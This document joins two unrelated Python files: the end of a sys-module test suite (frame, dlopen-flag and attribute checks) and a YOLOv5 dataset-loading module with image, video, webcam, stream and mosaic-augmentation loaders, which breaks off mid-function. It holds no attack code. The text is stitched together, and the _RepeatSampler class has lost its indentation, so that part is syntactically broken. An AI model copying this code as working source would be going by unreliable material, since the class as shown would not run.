            self.assert_(isinstance(v, tuple))
            self.assertEqual(len(v), 5)
            self.assert_(isinstance(v[0], int))
            self.assert_(isinstance(v[1], int))
            self.assert_(isinstance(v[2], int))
            self.assert_(isinstance(v[3], int))
            self.assert_(isinstance(v[4], str))
    def test_dlopenflags(self):
        # setdlopenflags/getdlopenflags round-trip (POSIX builds only).
        if hasattr(sys, "setdlopenflags"):
            self.assert_(hasattr(sys, "getdlopenflags"))
            self.assertRaises(TypeError, sys.getdlopenflags, 42)
            oldflags = sys.getdlopenflags()
            self.assertRaises(TypeError, sys.setdlopenflags)
            sys.setdlopenflags(oldflags+1)
            self.assertEqual(sys.getdlopenflags(), oldflags+1)
            sys.setdlopenflags(oldflags)
    def DONT_test_refcount(self):
        # Disabled (name does not start with "test"): refcount semantics are
        # CPython-specific and fragile.
        self.assertRaises(TypeError, sys.getrefcount)
        c = sys.getrefcount(None)
        n = None
        self.assertEqual(sys.getrefcount(None), c+1)
        del n
        self.assertEqual(sys.getrefcount(None), c)
        if hasattr(sys, "gettotalrefcount"):
            self.assert_(isinstance(sys.gettotalrefcount(), int))
    def test_getframe(self):
        # sys._getframe() with no argument returns the caller's own frame.
        self.assertRaises(TypeError, sys._getframe, 42, 42)
        self.assertRaises(ValueError, sys._getframe, 2000000000)
        self.assert_(
            SysModuleTest.test_getframe.im_func.func_code \
            is sys._getframe().f_code
        )
    # sys._current_frames() is a CPython-only gimmick.
    @test.test_support.impl_detail("CPython-only gimmick")
    def test_current_frames(self):
        # Dispatch to the threaded or unthreaded variant of the test.
        have_threads = True
        try:
            import thread
        except ImportError:
            have_threads = False
        if have_threads:
            self.current_frames_with_threads()
        else:
            self.current_frames_without_threads()
    # Test sys._current_frames() in a WITH_THREADS build.
    def current_frames_with_threads(self):
        import threading, thread
        import traceback
        # Spawn a thread that blocks at a known place.  Then the main
        # thread does sys._current_frames(), and verifies that the frames
        # returned make sense.
        entered_g = threading.Event()
        leave_g = threading.Event()
        thread_info = []  # the thread's id
        def f123():
            g456()
        def g456():
            thread_info.append(thread.get_ident())
            entered_g.set()
            leave_g.wait()
        t = threading.Thread(target=f123)
        t.start()
        entered_g.wait()
        # At this point, t has finished its entered_g.set(), although it's
        # impossible to guess whether it's still on that line or has moved on
        # to its leave_g.wait().
        self.assertEqual(len(thread_info), 1)
        thread_id = thread_info[0]
        d = sys._current_frames()
        main_id = thread.get_ident()
        self.assert_(main_id in d)
        self.assert_(thread_id in d)
        # Verify that the captured main-thread frame is _this_ frame.
        frame = d.pop(main_id)
        self.assert_(frame is sys._getframe())
        # Verify that the captured thread frame is blocked in g456, called
        # from f123.  This is a litte tricky, since various bits of
        # threading.py are also in the thread's call stack.
        frame = d.pop(thread_id)
        stack = traceback.extract_stack(frame)
        for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
            if funcname == "f123":
                break
        else:
            self.fail("didn't find f123() on thread's call stack")
        self.assertEqual(sourceline, "g456()")
        # And the next record must be for g456().
        filename, lineno, funcname, sourceline = stack[i+1]
        self.assertEqual(funcname, "g456")
        self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
        # Reap the spawned thread.
        leave_g.set()
        t.join()
    # Test sys._current_frames() when thread support doesn't exist.
    def current_frames_without_threads(self):
        # Not much happens here:  there is only one thread, with artificial
        # "thread id" 0.
        d = sys._current_frames()
        self.assertEqual(len(d), 1)
        self.assert_(0 in d)
        self.assert_(d[0] is sys._getframe())
    def test_attributes(self):
        # Sanity-check the types of sys's documented data attributes.
        self.assert_(isinstance(sys.api_version, int))
        self.assert_(isinstance(sys.argv, list))
        self.assert_(sys.byteorder in ("little", "big"))
        self.assert_(isinstance(sys.builtin_module_names, tuple))
        self.assert_(isinstance(sys.copyright, basestring))
        self.assert_(isinstance(sys.executable, basestring))
        self.assert_(isinstance(sys.hexversion, int))
        self.assert_(isinstance(sys.maxint, int))
        if test.test_support.have_unicode:
            self.assert_(isinstance(sys.maxunicode, int))
        self.assert_(isinstance(sys.platform, basestring))
        if hasattr(sys, 'prefix'):
            self.assert_(isinstance(sys.prefix, basestring))
            self.assert_(isinstance(sys.exec_prefix, basestring))
        else:
            self.assert_(isinstance(sys.pypy_prefix, basestring)) # PyPy only
        self.assert_(isinstance(sys.version, basestring))
        vi = sys.version_info
        self.assert_(isinstance(vi, tuple))
        self.assertEqual(len(vi), 5)
        self.assert_(isinstance(vi[0], int))
        self.assert_(isinstance(vi[1], int))
        self.assert_(isinstance(vi[2], int))
        self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
        self.assert_(isinstance(vi[4], int))
    def test_43581(self):
        # Can't use sys.stdout, as this is a cStringIO object when
        # the test runs under regrtest.
        self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_main():
    # regrtest entry point: run the whole SysModuleTest suite.
    test.test_support.run_unittest(SysModuleTest)
# Allow running this test file directly (outside the regrtest driver).
if __name__ == "__main__":
    test_main()
|
datasets.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, \
xywh2xyxy, xywhn2xyxy, xyxy2xywhn, xyn2xy
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo']  # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv']  # acceptable video suffixes
NUM_THREADS = min(8, os.cpu_count())  # number of multiprocessing threads
# Get orientation exif tag
# NOTE: this loop deliberately leaves `orientation` bound at module scope
# (the EXIF tag id for 'Orientation'); exif_size() reads it.
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def get_hash(paths):
    """Return an MD5 hex digest identifying a list of file/dir paths.

    The digest mixes the total on-disk size of the paths that exist with the
    concatenated path strings, so it changes when files change size or when
    the path list changes.
    """
    total_size = sum(os.path.getsize(p) for p in paths if os.path.exists(p))
    digest = hashlib.md5(str(total_size).encode())
    digest.update(''.join(paths).encode())
    return digest.hexdigest()
def exif_size(img):
    """Return the PIL image size (w, h), swapping the axes when the EXIF
    orientation tag indicates a 90- or 270-degree rotation."""
    size_wh = img.size  # (width, height)
    try:
        # `orientation` is the module-level EXIF tag id resolved at import time.
        if dict(img._getexif().items())[orientation] in (6, 8):  # 270 or 90 deg
            size_wh = (size_wh[1], size_wh[0])
    except:
        # No EXIF data or no orientation tag: keep the reported size.
        pass
    return size_wh
def exif_transpose(image):
    """
    Transpose a PIL image accordingly if it has an EXIF Orientation tag.
    From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
    :param image: The image to transpose.
    :return: An image.
    """
    exif = image.getexif()
    tag_value = exif.get(0x0112, 1)  # 0x0112 = Orientation; default 1 (upright)
    if tag_value > 1:
        transforms = {2: Image.FLIP_LEFT_RIGHT,
                      3: Image.ROTATE_180,
                      4: Image.FLIP_TOP_BOTTOM,
                      5: Image.TRANSPOSE,
                      6: Image.ROTATE_270,
                      7: Image.TRANSVERSE,
                      8: Image.ROTATE_90,
                      }
        method = transforms.get(tag_value)
        if method is not None:
            image = image.transpose(method)
            # Drop the tag so consumers don't re-apply the rotation.
            del exif[0x0112]
            image.info["exif"] = exif.tobytes()
    return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
                      rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
    """Build a LoadImagesAndLabels dataset and a matching DataLoader.

    Under DDP, rank 0 scans/caches the dataset first; the other ranks wait
    and then reuse the cache. Returns (dataloader, dataset).
    """
    with torch_distributed_zero_first(rank):  # rank 0 prepares the cache before the others
        dataset = LoadImagesAndLabels(path, imgsz, batch_size,
                                      augment=augment,  # augment images
                                      hyp=hyp,  # augmentation hyperparameters
                                      rect=rect,  # rectangular training
                                      cache_images=cache,
                                      single_cls=single_cls,
                                      stride=int(stride),
                                      pad=pad,
                                      image_weights=image_weights,
                                      prefix=prefix)
    batch_size = min(batch_size, len(dataset))
    num_workers = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers])
    sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
    # InfiniteDataLoader reuses workers across epochs; the vanilla DataLoader is
    # required when dataset attributes (image weights) change during training.
    loader_cls = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
    dataloader = loader_cls(dataset,
                            batch_size=batch_size,
                            num_workers=num_workers,
                            sampler=sampler,
                            pin_memory=True,
                            collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
    return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
    """ Dataloader that reuses workers

    Uses same syntax as vanilla DataLoader
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # DataLoader forbids rebinding batch_sampler after construction, so
        # bypass its __setattr__ to install a sampler that repeats forever.
        object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
        # One persistent iterator for the loader's whole lifetime — this is
        # what keeps the worker processes alive across epochs.
        self.iterator = super().__iter__()
    def __len__(self):
        # Length of one pass over the underlying (non-repeating) sampler.
        return len(self.batch_sampler.sampler)
    def __iter__(self):
        # Yield exactly one epoch's worth of batches from the persistent iterator.
        for i in range(len(self)):
            yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:  # for inference
    """Iterate over image and/or video files for inference.

    Each iteration yields (path, letterboxed CHW RGB image, original BGR
    image, cv2 capture object or None). Videos are read frame by frame.
    """
    def __init__(self, path, img_size=640, stride=32, auto=True):
        p = str(Path(path).resolve())  # os-agnostic absolute path
        if '*' in p:
            files = sorted(glob.glob(p, recursive=True))  # glob
        elif os.path.isdir(p):
            files = sorted(glob.glob(os.path.join(p, '*.*')))  # dir
        elif os.path.isfile(p):
            files = [p]  # files
        else:
            raise Exception(f'ERROR: {p} does not exist')
        # Partition by file extension into images and videos.
        images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
        videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
        ni, nv = len(images), len(videos)
        self.img_size = img_size
        self.stride = stride
        self.files = images + videos
        self.nf = ni + nv  # number of files
        self.video_flag = [False] * ni + [True] * nv
        self.mode = 'image'
        self.auto = auto
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nf > 0, f'No images or videos found in {p}. ' \
                            f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
    def __iter__(self):
        # Restart iteration from the first file.
        self.count = 0
        return self
    def __next__(self):
        if self.count == self.nf:
            raise StopIteration
        path = self.files[self.count]
        if self.video_flag[self.count]:
            # Read video
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                # Current video exhausted: advance to the next file.
                self.count += 1
                self.cap.release()
                if self.count == self.nf:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()
            self.frame += 1
            # print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')
        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            print(f'image {self.count}/{self.nf} {path}: ', end='')
        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)
        return path, img, img0, self.cap
    def new_video(self, path):
        # Open the next video file and reset the per-video frame counter.
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
    def __len__(self):
        return self.nf  # number of files
class LoadWebcam:  # for inference
    """Iterate frames from a local webcam (or an arbitrary cv2 source string).

    Yields (path, letterboxed CHW RGB image, original BGR frame, None) until
    the user presses 'q'.
    """
    def __init__(self, pipe='0', img_size=640, stride=32):
        self.img_size = img_size
        self.stride = stride
        # A numeric string is a local camera index; anything else is passed to
        # OpenCV as-is (device path / pipeline). int() replaces the original
        # eval(), which executed the input string as Python code.
        self.pipe = int(pipe) if pipe.isnumeric() else pipe
        self.cap = cv2.VideoCapture(self.pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size
    def __iter__(self):
        self.count = -1
        return self
    def __next__(self):
        self.count += 1
        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration
        # Read frame
        ret_val, img0 = self.cap.read()
        img0 = cv2.flip(img0, 1)  # flip left-right
        # Print
        assert ret_val, f'Camera Error {self.pipe}'
        img_path = 'webcam.jpg'
        print(f'webcam {self.count}: ', end='')
        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]
        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)
        return img_path, img, img0, None
    def __len__(self):
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """Read frames from several IP/RTSP/webcam streams in daemon threads.

    Iteration yields (sources, stacked letterboxed CHW RGB batch, list of
    original BGR frames, None) until a reader thread dies or 'q' is pressed.
    """
    def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
        self.mode = 'stream'
        self.img_size = img_size
        self.stride = stride
        if os.path.isfile(sources):
            # A text file: one stream URL per non-empty line.
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
        else:
            sources = [sources]
        n = len(sources)
        self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
        self.sources = [clean_str(x) for x in sources]  # clean source names for later
        self.auto = auto
        for i, s in enumerate(sources):  # index, source
            # Start thread to read frames from video stream
            print(f'{i + 1}/{n}: {s}... ', end='')
            if 'youtube.com/' in s or 'youtu.be/' in s:  # if source is YouTube video
                check_requirements(('pafy', 'youtube_dl'))
                import pafy
                s = pafy.new(s).getbest(preftype="mp4").url  # YouTube URL
            # A numeric string (e.g. '0') selects a local webcam. int() replaces
            # the original eval(), which executed the source string as code.
            s = int(s) if s.isnumeric() else s
            cap = cv2.VideoCapture(s)
            assert cap.isOpened(), f'Failed to open {s}'
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0  # 30 FPS fallback
            self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf')  # infinite stream fallback
            _, self.imgs[i] = cap.read()  # guarantee first frame
            self.threads[i] = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
            self.threads[i].start()
        print('')  # newline
        # check for common shapes
        s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
        self.rect = np.unique(s, axis=0).shape[0] == 1  # rect inference if all shapes equal
        if not self.rect:
            print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
    def update(self, i, cap):
        # Read stream `i` frames in daemon thread
        n, f, read = 0, self.frames[i], 1  # frame number, frame array, inference every 'read' frame
        while cap.isOpened() and n < f:
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n % read == 0:
                success, im = cap.retrieve()
                # On a failed retrieve, blank the frame rather than keep a stale one.
                self.imgs[i] = im if success else self.imgs[i] * 0
            time.sleep(1 / self.fps[i])  # wait time
    def __iter__(self):
        self.count = -1
        return self
    def __next__(self):
        self.count += 1
        if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration
        # Letterbox
        img0 = self.imgs.copy()
        img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
        # Stack
        img = np.stack(img, 0)
        # Convert
        img = img[..., ::-1].transpose((0, 3, 1, 2))  # BGR to RGB, BHWC to BCHW
        img = np.ascontiguousarray(img)
        return self.sources, img, img0, None
    def __len__(self):
        return len(self.sources)  # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
    """Map image paths to label paths: swap the last /images/ directory for
    /labels/ and the file suffix for .txt."""
    img_dir = os.sep + 'images' + os.sep
    label_dir = os.sep + 'labels' + os.sep
    return [label_dir.join(p.rsplit(img_dir, 1)).rsplit('.', 1)[0] + '.txt' for p in img_paths]
class LoadImagesAndLabels(Dataset):  # for training/testing
    """YOLOv5 train/val dataset.

    Scans images and their label files (with a .cache file to skip rescans),
    supports RAM/disk image caching, rectangular batching, and mosaic/mixup/
    HSV/flip augmentations in __getitem__.
    """
    def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
                 cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
        self.img_size = img_size
        self.augment = augment
        self.hyp = hyp  # augmentation hyperparameter dict
        self.image_weights = image_weights
        self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
        self.mosaic_border = [-img_size // 2, -img_size // 2]
        self.stride = stride
        self.path = path
        self.albumentations = Albumentations() if augment else None
        try:
            f = []  # image files
            for p in path if isinstance(path, list) else [path]:
                p = Path(p)  # os-agnostic
                if p.is_dir():  # dir
                    f += glob.glob(str(p / '**' / '*.*'), recursive=True)
                    # f = list(p.rglob('**/*.*'))  # pathlib
                elif p.is_file():  # file
                    with open(p, 'r') as t:
                        t = t.read().strip().splitlines()
                        parent = str(p.parent) + os.sep
                        f += [x.replace('./', parent) if x.startswith('./') else x for x in t]  # local to global path
                        # f += [p.parent / x.lstrip(os.sep) for x in t]  # local to global path (pathlib)
                else:
                    raise Exception(f'{prefix}{p} does not exist')
            self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS])
            # self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats])  # pathlib
            assert self.img_files, f'{prefix}No images found'
        except Exception as e:
            raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
        # Check cache
        self.label_files = img2label_paths(self.img_files)  # labels
        # NOTE(review): `p` here is the last path from the loop above — fine for a
        # single path, questionable for list inputs; confirm intended.
        cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
        try:
            cache, exists = np.load(cache_path, allow_pickle=True).item(), True  # load dict
            # Reject caches from other code versions or stale file sets.
            assert cache['version'] == 0.4 and cache['hash'] == get_hash(self.label_files + self.img_files)
        except:
            cache, exists = self.cache_labels(cache_path, prefix), False  # cache
        # Display cache
        nf, nm, ne, nc, n = cache.pop('results')  # found, missing, empty, corrupted, total
        if exists:
            d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
            tqdm(None, desc=prefix + d, total=n, initial=n)  # display cache results
            if cache['msgs']:
                logging.info('\n'.join(cache['msgs']))  # display warnings
        assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
        # Read cache
        [cache.pop(k) for k in ('hash', 'version', 'msgs')]  # remove items
        labels, shapes, self.segments = zip(*cache.values())
        self.labels = list(labels)
        self.shapes = np.array(shapes, dtype=np.float64)
        self.img_files = list(cache.keys())  # update
        self.label_files = img2label_paths(cache.keys())  # update
        if single_cls:
            # Collapse every class id to 0 for single-class training.
            for x in self.labels:
                x[:, 0] = 0
        n = len(shapes)  # number of images
        # NOTE(review): np.int is deprecated in NumPy >= 1.20; plain int is equivalent here.
        bi = np.floor(np.arange(n) / batch_size).astype(np.int)  # batch index
        nb = bi[-1] + 1  # number of batches
        self.batch = bi  # batch index of image
        self.n = n
        self.indices = range(n)
        # Rectangular Training
        if self.rect:
            # Sort by aspect ratio
            s = self.shapes  # wh
            ar = s[:, 1] / s[:, 0]  # aspect ratio
            irect = ar.argsort()
            self.img_files = [self.img_files[i] for i in irect]
            self.label_files = [self.label_files[i] for i in irect]
            self.labels = [self.labels[i] for i in irect]
            self.shapes = s[irect]  # wh
            ar = ar[irect]
            # Set training image shapes
            shapes = [[1, 1]] * nb
            for i in range(nb):
                ari = ar[bi == i]
                mini, maxi = ari.min(), ari.max()
                if maxi < 1:
                    shapes[i] = [maxi, 1]
                elif mini > 1:
                    shapes[i] = [1, 1 / mini]
            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
        # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
        self.imgs, self.img_npy = [None] * n, [None] * n
        if cache_images:
            if cache_images == 'disk':
                # Disk cache: one .npy per image, in a sibling '<dir>_npy' folder.
                self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
                self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
                self.im_cache_dir.mkdir(parents=True, exist_ok=True)
            gb = 0  # Gigabytes of cached images
            self.img_hw0, self.img_hw = [None] * n, [None] * n
            results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
            pbar = tqdm(enumerate(results), total=n)
            for i, x in pbar:
                if cache_images == 'disk':
                    if not self.img_npy[i].exists():
                        np.save(self.img_npy[i].as_posix(), x[0])
                    gb += self.img_npy[i].stat().st_size
                else:
                    self.imgs[i], self.img_hw0[i], self.img_hw[i] = x  # im, hw_orig, hw_resized = load_image(self, i)
                    gb += self.imgs[i].nbytes
                pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
            pbar.close()
    def cache_labels(self, path=Path('./labels.cache'), prefix=''):
        # Cache dataset labels, check images and read shapes
        x = {}  # dict
        nm, nf, ne, nc, msgs = 0, 0, 0, 0, []  # number missing, found, empty, corrupt, messages
        desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
        with Pool(NUM_THREADS) as pool:
            # verify_image_label runs in worker processes, one (img, label) pair each.
            pbar = tqdm(pool.imap_unordered(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
                        desc=desc, total=len(self.img_files))
            for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
                nm += nm_f
                nf += nf_f
                ne += ne_f
                nc += nc_f
                if im_file:
                    x[im_file] = [l, shape, segments]
                if msg:
                    msgs.append(msg)
                pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
        pbar.close()
        if msgs:
            logging.info('\n'.join(msgs))
        if nf == 0:
            logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
        x['hash'] = get_hash(self.label_files + self.img_files)
        x['results'] = nf, nm, ne, nc, len(self.img_files)
        x['msgs'] = msgs  # warnings
        x['version'] = 0.4  # cache version
        try:
            np.save(path, x)  # save cache for next time
            path.with_suffix('.cache.npy').rename(path)  # remove .npy suffix
            logging.info(f'{prefix}New cache created: {path}')
        except Exception as e:
            logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}')  # path not writeable
        return x
    def __len__(self):
        return len(self.img_files)
    # def __iter__(self):
    #     self.count = -1
    #     print('ran dataset iter')
    #     #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
    #     return self
    def __getitem__(self, index):
        # Returns (CHW RGB tensor, labels tensor (n, 6), image path, shapes-or-None).
        index = self.indices[index]  # linear, shuffled, or image_weights
        hyp = self.hyp
        mosaic = self.mosaic and random.random() < hyp['mosaic']
        if mosaic:
            # Load mosaic
            img, labels = load_mosaic(self, index)
            shapes = None
            # MixUp augmentation
            if random.random() < hyp['mixup']:
                img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
        else:
            # Load image
            img, (h0, w0), (h, w) = load_image(self, index)
            # Letterbox
            shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling
            labels = self.labels[index].copy()
            if labels.size:  # normalized xywh to pixel xyxy format
                labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
            if self.augment:
                img, labels = random_perspective(img, labels,
                                                 degrees=hyp['degrees'],
                                                 translate=hyp['translate'],
                                                 scale=hyp['scale'],
                                                 shear=hyp['shear'],
                                                 perspective=hyp['perspective'])
        nl = len(labels)  # number of labels
        if nl:
            labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
        if self.augment:
            # Albumentations
            img, labels = self.albumentations(img, labels)
            nl = len(labels)  # update after albumentations
            # HSV color-space
            augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
            # Flip up-down
            if random.random() < hyp['flipud']:
                img = np.flipud(img)
                if nl:
                    labels[:, 2] = 1 - labels[:, 2]
            # Flip left-right
            if random.random() < hyp['fliplr']:
                img = np.fliplr(img)
                if nl:
                    labels[:, 1] = 1 - labels[:, 1]
            # Cutouts
            # labels = cutout(img, labels, p=0.5)
        # Column 0 is left zero; collate_fn fills in the batch image index.
        labels_out = torch.zeros((nl, 6))
        if nl:
            labels_out[:, 1:] = torch.from_numpy(labels)
        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)
        return torch.from_numpy(img), labels_out, self.img_files[index], shapes
    @staticmethod
    def collate_fn(batch):
        img, label, path, shapes = zip(*batch)  # transposed
        for i, l in enumerate(label):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img, 0), torch.cat(label, 0), path, shapes
    @staticmethod
    def collate_fn4(batch):
        # Quad collate: merge each group of 4 samples into one (either a single
        # upscaled image or a 2x2 tile), rescaling labels to match.
        img, label, path, shapes = zip(*batch)  # transposed
        n = len(shapes) // 4
        img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
        ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
        wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
        s = torch.tensor([[1, 1, .5, .5, .5, .5]])  # scale
        for i in range(n):  # zidane torch.zeros(16,3,720,1280)  # BCHW
            i *= 4
            if random.random() < 0.5:
                im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
                    0].type(img[i].type())
                l = label[i]
            else:
                im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
                l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
            img4.append(im)
            label4.append(l)
        for i, l in enumerate(label4):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
    """Load dataset image `i`.

    Returns (im, (h0, w0), (h, w)): the BGR image, its original height/width
    and its resized height/width (longest side scaled to self.img_size).
    """
    cached = self.imgs[i]
    if cached is not None:
        # Already cached in RAM: return it together with its recorded sizes.
        return cached, self.img_hw0[i], self.img_hw[i]

    npy = self.img_npy[i]
    if npy and npy.exists():
        # Prefer the pre-decoded .npy cache over decoding the image file.
        im = np.load(npy)
    else:
        path = self.img_files[i]
        im = cv2.imread(path)  # BGR
        assert im is not None, 'Image Not Found ' + path

    h0, w0 = im.shape[:2]  # original hw
    r = self.img_size / max(h0, w0)  # resize ratio
    if r != 1:
        # INTER_AREA for plain downscaling quality; INTER_LINEAR when
        # upscaling or when augmenting.
        interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
        im = cv2.resize(im, (int(w0 * r), int(h0 * r)), interpolation=interp)
    return im, (h0, w0), im.shape[:2]
def load_mosaic(self, index):
    """Build a 4-image mosaic for dataset item `index`.

    The requested image plus 3 randomly chosen ones are tiled around a random
    mosaic center on a 2s x 2s canvas (s = self.img_size); labels/segments are
    shifted into mosaic pixel coordinates, clipped, then augmented with
    copy_paste and random_perspective. Returns (img4, labels4).
    """
    # loads images in a 4-mosaic
    labels4, segments4 = [], []
    s = self.img_size
    yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]  # mosaic center x, y
    indices = [index] + random.choices(self.indices, k=3)  # 3 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img4: (x1a..y2a) is the destination window on the big
        # canvas, (x1b..y2b) the matching source window of the loaded image
        if i == 0:  # top left
            img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
